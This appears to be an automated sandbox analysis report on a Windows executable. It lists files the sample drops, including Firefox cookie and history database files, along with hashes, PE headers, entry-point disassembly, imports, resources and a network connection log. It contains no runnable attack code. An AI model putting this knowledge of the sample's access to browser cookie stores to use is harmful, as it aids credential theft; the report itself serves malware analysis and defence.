Preview:	L..................F.@.. ...$+.,....=......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........P#.w.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	3.9977764793365695
Encrypted:	false
SSDEEP:	48:8xId/T33sHYidAKZdA14tseh7sFiZUkmgqeh7sxgy+BX:8xMzlnDgy
MD5:	8E89D9FF5AF7E0A1CB6497A0BA3C2435
SHA1:	EBF14DC0E7C1FAF7B1EF6DB304B5E7CFD43B9D99
SHA-256:	A2C0086286EBE802AC73EE6288E7D0189B09045FC3091889F718FA046EDB2721
SHA-512:	A90DA6722B628B3557914863E8AC40D05D84A96208ADA1D8EBDADA9B9E7111CE3460CC7FE106A00FE8792CA422C9D3CD98AC0491CF7BA10CC5316FC4EF58A6A8
Malicious:	false
Preview:	L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........P#.w.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu May 2 23:07:08 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.987736076621132
Encrypted:	false
SSDEEP:	48:8Dd/T33LHYidAKZdA1vehDiZUkwqehbgy+R:8dzTJgy
MD5:	9FA5BD5B2F820DAE278C9EC26F077B9F
SHA1:	F258735B14DDE6706BE27D0D1C7A6DCB92725947
SHA-256:	0A4E4F15F188207AC1DCF955EDE7B1D23073573D7B2918B9F7D335AC743DEBDC
SHA-512:	9B7DFE8AC2E1EAE80125F4C5621143D782A4BCE96C5A3098C936A2FC0A3083C0C69EE31C62AA2C1A29CB14550A380AFB6B313EB6C24BD9F3C01584F7B7179B05
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....}.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........P#.w.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu May 2 23:07:08 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9755600029797846
Encrypted:	false
SSDEEP:	48:8Pd/T33LHYidAKZdA1hehBiZUk1W1qeh1gy+C:8pzD9Vgy
MD5:	F1013F036565630E870A237E3BA2E5DF
SHA1:	31C2415392A7D38410AF197130E8D8900040EEB6
SHA-256:	8835B611CFC84C9A5AFB6BA436131DFEAC101A72A810A7FDC0B97036A7FEF7DD
SHA-512:	25EACBF972DCBB5278C6A3ABA76AEF533D0B1736EC1B3E75E7CEE5B54C468211C0A14D7388373DDF6F25C5024F83EDFE5C0064D761AEEBE53A10090D0CBCE21C
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....Y.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........P#.w.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu May 2 23:07:08 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.9850739775369575
Encrypted:	false
SSDEEP:	48:8Kd/T33LHYidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbDgy+yT+:8ezzT/TbxWOvTbDgy7T
MD5:	0B9AB9F01668B97E01C963C66E083790
SHA1:	298291302718973B8F1CBCC7FCC55EAE9E12D1EC
SHA-256:	4681AE51612D30C869AC6178FC321D2AB9002041789E6EB2C9BC3C12AEF095D8
SHA-512:	B826458066BFF5E04CB3E9B2905D39E7708292B7D144642DE40EAFC9FD224146C02527ABB649ECF655989C02A2F2D50C6DE68632D8525F0712BB0AF391A06F72
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....+.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........P#.w.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\c4RAHq3BNl.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\c4RAHq3BNl.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Chrome Cache Entry: 95

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (4568)
Category:	downloaded
Size (bytes):	4573
Entropy (8bit):	5.800702472431864
Encrypted:	false
SSDEEP:	96:9/N8liK6IN6666Vn94gn6hq0el5D/2PXwKMaZhwl2UjmEBjo2t9eeegUfffffX:1NK1N6666V+gVl5Hu3C98
MD5:	660FA38F6BF2FBBA8AB633D4FE55969F
SHA1:	8DDCA5AD44A8BDA7C80E5B3EE2DA12E85574D330
SHA-256:	AF7AE626695FAF323FF522C8BE6C6E57D2938507B6BE61742067DFB082CEED76
SHA-512:	67CDAEC1E2814FE5C91C7C82C0C002D0069138F3B44DBACB264BCD4F211107993B71C125A68CF28163DDD31F2D2E7E3EEFA3D286B3C3532798BE4A17E0EEAD7B
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["smite 2 alpha test","rare bird sighting","starbucks bogo drinks","leave no man behind gray zone warfare","mlb cubs mets","san jacinto river flooding conroe","vanderpump rules","damonic williams transfer portal"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"CgovbS8wcGRsNTg4EhpBbWVyaWNhbiB0ZWxldmlzaW9uIHNlcmllczKLFWRhdGE6aW1hZ2UvanBlZztiYXNlNjQsLzlqLzRBQVFTa1pKUmdBQkFRQUFBUUFCQUFELzJ3Q0VBQWtHQndnSEJna0lCd2dLQ2drTERSWVBEUXdNRFJzVUZSQVdJQjBpSWlBZEh4OGtLRFFzSkNZeEp4OGZMVDB0TVRVM09qbzZJeXMvUkQ4NFF6UTVPamNCQ2dvS0RRd05HZzhQR2pjbEh5VTNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTi8vQUFCRUlBRUFBUUFNQklnQUNFUUVERVFIL3hBQWNBQUVBQXdBREFRRUFBQUFBQUFBQUFBQUdCQVVIQVFJRENBRC94QUExRUFBQ0FRSUVCUUlEQndNRkFBQUFBQUFCQWdNRUVRQUZFaUVHRXpGQlVTS

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.367306161744856
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	c4RAHq3BNl.exe
File size:	356'352 bytes
MD5:	5451fddd7b59b191df90b89a06ef1691
SHA1:	c8e14fb63a8270a86be838a3a7421207e288b63e
SHA256:	5bbf9fcd8089681980082a04c01123473ab38328873ca7af33e8f9bd80402fe5
SHA512:	2c01138924905da8665b41a9382b5191c138c0de981369597db9024ecf62cc999ada0e0fabdf2a6d71fd1cd4d94e50c7ee0a0472e605e4a4518293401b67f493
SSDEEP:	6144:PlcE7ENJMDliUGW9muyU/zTjDlgMh6UeECXsSg4xrp2f:Nx7eJMDlkv6bTjDlgMh6P8wT2f
TLSH:	1474BE01F6B0D822DD194B3F4D2DC5E4662EBE656A70E29E72443ECF1AF35A08572F12
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..\...\...\....B..]...B_..M...B_..;...B_..v...{...Y...\...,...B_..]...B_..]...B_..]...Rich\...........PE..L...za.c...........

File Icon


Icon Hash:	13290d0d29170f17

Static PE Info

General

Entrypoint:	0x401604
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6393617A [Fri Dec 9 16:25:30 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	20a6a1c56501f5fd78f9b0e0618fa18b

Entrypoint Preview

Instruction
call 00007FDE00BAA3F8h
jmp 00007FDE00BA695Dh
int3
int3
mov ecx, dword ptr [esp+04h]
test ecx, 00000003h
je 00007FDE00BA6B06h
mov al, byte ptr [ecx]
add ecx, 01h
test al, al
je 00007FDE00BA6B30h
test ecx, 00000003h
jne 00007FDE00BA6AD1h
add eax, 00000000h
lea esp, dword ptr [esp+00000000h]
lea esp, dword ptr [esp+00000000h]
mov eax, dword ptr [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, FFFFFFFFh
xor eax, edx
add ecx, 04h
test eax, 81010100h
je 00007FDE00BA6ACAh
mov eax, dword ptr [ecx-04h]
test al, al
je 00007FDE00BA6B14h
test ah, ah
je 00007FDE00BA6B06h
test eax, 00FF0000h
je 00007FDE00BA6AF5h
test eax, FF000000h
je 00007FDE00BA6AE4h
jmp 00007FDE00BA6AAFh
lea eax, dword ptr [ecx-01h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-02h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-03h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-04h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword ptr [ebp+08h]
push esi
push edi
push 00000008h
pop ecx
mov esi, 0040C1FCh
lea edi, dword ptr [ebp-20h]
rep movsd
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
mov dword ptr [ebp-04h], eax
pop esi
test eax, eax
je 00007FDE00BA6AEEh
test byte ptr [eax], 00000008h
je 00007FDE00BA6AE9h
mov dword ptr [ebp-0Ch], 00000000h

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[C++] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d41c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x26fc000	0x17b78	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xc000	0x184	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa8b3	0xaa00	515e132abeba67c6d6701e6aae7e13ae	False	0.6130514705882353	data	6.5683285586563915	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xc000	0x31cf6	0x31e00	0db04d599d0cb3d0e712182825706f69	False	0.7191709743107769	data	6.665991254113883	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x26bd33c	0x2800	f60929ce4e60a08b9e7fc37c05e66bfd	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x26fc000	0x17b78	0x17c00	a2fe1d83f1a2ed2df160ed068ca19c13	False	0.4372121710526316	data	4.962055381687256	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
DOWOKEYOT	0x270f030	0x476	ASCII text, with very long lines (1142), with no line terminators	Turkish	Turkey	0.6225919439579685
RT_CURSOR	0x270f4c8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.31023454157782515
RT_CURSOR	0x2710388	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x27104b8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_ICON	0x26fc840	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.4131130063965885
RT_ICON	0x26fd6e8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.5419675090252708
RT_ICON	0x26fdf90	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.592741935483871
RT_ICON	0x26fe658	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6596820809248555
RT_ICON	0x26febc0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Turkish	Turkey	0.49066390041493774
RT_ICON	0x2701168	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.5086772983114447
RT_ICON	0x2702210	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.5754098360655737
RT_ICON	0x2702b98	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.5948581560283688
RT_ICON	0x2703078	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.39285714285714285
RT_ICON	0x2703f20	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.5180505415162455
RT_ICON	0x27047c8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.5766129032258065
RT_ICON	0x2704e90	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6264450867052023
RT_ICON	0x27053f8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Turkish	Turkey	0.4658713692946058
RT_ICON	0x27079a0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.521311475409836
RT_ICON	0x2708328	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.5452127659574468
RT_ICON	0x27087f8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.43336886993603413
RT_ICON	0x27096a0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.5636281588447654
RT_ICON	0x2709f48	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.5967741935483871
RT_ICON	0x270a610	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.6589595375722543
RT_ICON	0x270ab78	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Turkish	Turkey	0.3755186721991701
RT_ICON	0x270d120	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Turkish	Turkey	0.399859287054409
RT_ICON	0x270e1c8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Turkish	Turkey	0.42008196721311475
RT_ICON	0x270eb50	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Turkish	Turkey	0.424645390070922
RT_STRING	0x2712c68	0x59c	data			0.4415041782729805
RT_STRING	0x2713208	0xa0	data			0.5875
RT_STRING	0x27132a8	0x5c0	data			0.4375
RT_STRING	0x2713868	0x1ce	data			0.5021645021645021
RT_STRING	0x2713a38	0x13a	data			0.5031847133757962
RT_ACCELERATOR	0x270f4a8	0x20	data			1.09375
RT_GROUP_CURSOR	0x2710370	0x14	data			1.25
RT_GROUP_CURSOR	0x2712a60	0x22	data			1.088235294117647
RT_GROUP_ICON	0x2703000	0x76	data	Turkish	Turkey	0.6610169491525424
RT_GROUP_ICON	0x2708790	0x68	data	Turkish	Turkey	0.7019230769230769
RT_GROUP_ICON	0x270efb8	0x76	data	Turkish	Turkey	0.6694915254237288
RT_VERSION	0x2712a88	0x1e0	data			0.5708333333333333

Imports

DLL

Import

KERNEL32.dll

GetCommState, SetDefaultCommConfigW, SetConsoleScreenBufferSize, FreeEnvironmentStringsA, GetModuleHandleW, GetProcessHeap, GetConsoleAliasesLengthA, GetSystemTimes, GetVolumeInformationA, LoadLibraryW, IsBadCodePtr, GetConsoleAliasExesLengthW, lstrcpynW, WriteConsoleW, SetConsoleTitleA, GetLocaleInfoA, FindFirstFileExA, SetLastError, GetProcAddress, GetLongPathNameA, GetConsoleDisplayMode, SetFileAttributesA, BuildCommDCBW, SetFileApisToOEM, LoadLibraryA, LocalAlloc, FindAtomA, WaitForMultipleObjects, GetCurrentDirectoryA, EnumDateFormatsW, GetSystemTime, SetCurrentDirectoryA, EnumCalendarInfoA, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, GetLastError, HeapFree, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, DeleteCriticalSection, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, GetConsoleCP, GetConsoleMode, EnterCriticalSection, LeaveCriticalSection, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, VirtualAlloc, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, CreateFileA, CloseHandle, FlushFileBuffers

ADVAPI32.dll

ReadEventLogA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 3, 2024 02:06:57.756520033 CEST	49674	443	192.168.2.5	23.1.237.91
May 3, 2024 02:06:57.756521940 CEST	49675	443	192.168.2.5	23.1.237.91
May 3, 2024 02:06:57.850264072 CEST	49673	443	192.168.2.5	23.1.237.91
May 3, 2024 02:07:06.309700012 CEST	49706	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.309760094 CEST	443	49706	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.309819937 CEST	49706	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.318562031 CEST	49707	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.318612099 CEST	443	49707	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.318682909 CEST	49707	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.331286907 CEST	49707	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.331302881 CEST	443	49707	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.331578016 CEST	49706	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.331598043 CEST	443	49706	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.361923933 CEST	49710	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.361959934 CEST	443	49710	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.362024069 CEST	49710	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.430782080 CEST	49710	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.430798054 CEST	443	49710	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.451231956 CEST	49711	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.451273918 CEST	443	49711	142.250.176.196	192.168.2.5
May 3, 2024 02:07:06.451359987 CEST	49711	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.452272892 CEST	49711	443	192.168.2.5	142.250.176.196
May 3, 2024 02:07:06.452285051 CEST	443	49711	142.250.176.196	192.168.2.5
